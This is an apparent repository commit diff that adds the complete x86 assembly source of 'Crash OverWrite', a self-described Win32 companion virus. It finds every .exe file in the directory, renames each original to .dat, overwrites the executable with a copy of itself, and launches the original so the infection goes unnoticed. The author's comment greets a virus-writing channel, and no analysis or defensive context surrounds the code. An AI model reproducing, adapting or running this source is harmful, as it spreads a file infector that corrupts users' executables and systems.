Updated dir structure in Win32

2026-06-16 07:49:24 +00:00 · 2020-10-16 23:26:21 +02:00
parent b022d14189
commit cfc6699241
173 changed files with 0 additions and 0 deletions
@@ -0,0 +1,224 @@
+comment *
+
+   Name:  Crash OverWrite :-)
+   Coder: BeLiAL
+   Type: Companion
+   Anything else: NO
+   
+   This is my first win32 virus.Its only a
+   companionvirus but it does his work very
+   well.Its perhaps coded not so fine but
+   im sure nobody will care.It infects all
+   files in the directory and renames
+   the victimfile to .dat .Perhaps i will make
+   infecting more files...
+   Its without payload and any  weapons :)
+   It Doesnt infect dos-files correctly.
+   Greetings to the whole #vx channel on undernet
+  
+   BeLiAL
+*
+
+  .386
+  .model flat
+  Locals
+  Jumps
+
+  Extrn FindFirstFileA :PROC
+  Extrn FindNextFileA  :PROC
+  Extrn CreateFileA    :PROC
+  Extrn WriteFile      :PROC
+  Extrn ReadFile       :PROC
+  Extrn GlobalAlloc    :PROC
+  Extrn GlobalFree     :PROC
+  Extrn ExitProcess    :PROC
+  Extrn WinExec        :PROC
+  Extrn CopyFileA      :PROC
+  Extrn CloseHandle    :PROC
+  Extrn SetFilePointer :PROC
+  Extrn GetFileSize    :PROC
+
+  .data
+
+  MAX_PATH     EQU 0ffh
+  FALSE        EQU 0
+  changeoffset EQU 094fh
+  winsize      EQU 01h
+
+   FILETIME struct
+   dwLowDateTime         DWORD   ?
+   dwHighDateTime        DWORD   ?      
+   FILETIME ends
+
+   WIN32_FIND_DATA struct
+   dwFileAttributes      DWORD   ?
+   ftCreationTime        FILETIME <>
+   ftLastAccessTime      FILETIME <>        
+   ftLastWriteTime       FILETIME <>      
+   nFileSizeHigh         DWORD   ?        
+   nFileSizeLow          DWORD   ?      
+   dwReserved0           DWORD   ?       
+   dwReserved1           DWORD   ?       
+   cFileName             BYTE MAX_PATH dup(?)
+   cAlternate            BYTE 0eh dup(?)   
+   ends
+   FindFileData    WIN32_FIND_DATA <>
+
+  memptr       dd   0
+  counter1     dd   0
+  filehandle   dd   0
+  filesize     dd   00001000h
+  exefile      db  '*.exe',0
+  myname       db  'crashoverwrite.exe',0
+               dd   0
+               dd   0
+  secbuffer    dd   0
+               dd   0
+               dd   0
+  searchhandle dd   0
+               db  '[Crash OverWrite] coded by BeLiAL'
+
+  .code
+
+start:
+  push offset FindFileData
+  push offset exefile
+  call FindFirstFileA
+  mov searchhandle,eax
+already_infected:
+  mov eax,dword ptr nFileSizeLow.FindFileData
+  cmp eax,00001000h
+  je find_next_victim
+  mov eax,offset cFileName.FindFileData
+  jmp find_dot1
+find_next_victim:
+  push offset FindFileData
+  push searchhandle
+  call FindNextFileA
+  test eax,eax
+  jz reanimate
+  jmp already_infected
+find_dot1:
+  cmp byte ptr ds:[eax],'.'
+  je next_step1
+  add eax,1
+  jmp find_dot1
+next_step1:
+  add eax,1
+  push eax
+  mov byte ptr ds:[eax],'d'
+  add eax,1
+  mov byte ptr ds:[eax],'a'
+  add eax,1
+  mov byte ptr ds:[eax],'t'
+  mov ebx,offset cFileName.FindFileData
+  mov eax,offset secbuffer
+find_dot2:
+  mov dh,byte ptr ds:[ebx]
+  cmp edx,0
+  je next_step2
+  mov byte ptr ds:[eax],dh
+  add ebx,1
+  add eax,1
+  jmp find_dot2
+next_step2:
+  pop eax
+  push FALSE
+  push offset secbuffer
+  mov byte ptr ds:[eax],'e'
+  add eax,1
+  mov byte ptr ds:[eax],'x'
+  add eax,1
+  mov byte ptr ds:[eax],'e'
+  push offset cFileName.FindFileData
+  call CopyFileA
+  push FALSE
+  push offset cFileName.FindFileData
+  push offset myname
+  call CopyFileA
+open_victim:
+  push 0
+  push 080h        
+  push 3h         
+  push 0h          
+  push 0h          
+  push 0c0000000h  
+  push offset FindFileData.cFileName
+  Call CreateFileA 
+  mov filehandle,eax
+  cmp eax,0ffffffffh
+  je find_next_victim
+getmemory:
+  push filesize 
+  push 0
+  Call GlobalAlloc  ;get the memory
+  mov edx,eax
+  cmp eax,0
+  je close_file
+  push edx
+copyinmemory:
+  push 0
+  push offset counter1
+  push filesize
+  push edx
+  push filehandle
+  Call ReadFile
+  pop edx
+  mov dword ptr memptr,edx    ;for later use
+  add edx,changeoffset
+  mov eax,offset cFileName.FindFileData
+modify_victim:
+  mov bh,byte ptr ds:[eax]
+  mov byte ptr ds:[edx],bh
+  cmp bh,0
+  je set_pointer
+  add eax,1
+  add edx,1
+  jmp modify_victim
+set_pointer:
+  push 0
+  push 0
+  push 0
+  push filehandle
+  call SetFilePointer
+copy_to_file:
+  push 0
+  push offset counter1
+  push filesize
+  push memptr
+  push filehandle
+  call WriteFile
+close_file:
+  push filehandle
+  call CloseHandle
+  jmp find_next_victim
+reanimate:
+  mov eax,offset myname
+find_dot3:
+  mov bx,word ptr ds:[eax]
+  cmp bx,'e.'
+  je next_step3
+  cmp bx,'E.'      
+  je next_step3
+  add eax,1
+  jmp find_dot3
+next_step3:
+  add eax,1
+  mov byte ptr ds:[eax],'d'
+  add eax,1
+  mov byte ptr ds:[eax],'a'
+  add eax,1
+  mov byte ptr ds:[eax],'t'
+  add eax,1
+  mov byte ptr ds:[eax],00h
+that_was_all:
+  push winsize
+  push offset myname
+  call WinExec
+final:
+  push 0
+  call ExitProcess
+
+  ends
+  end start
+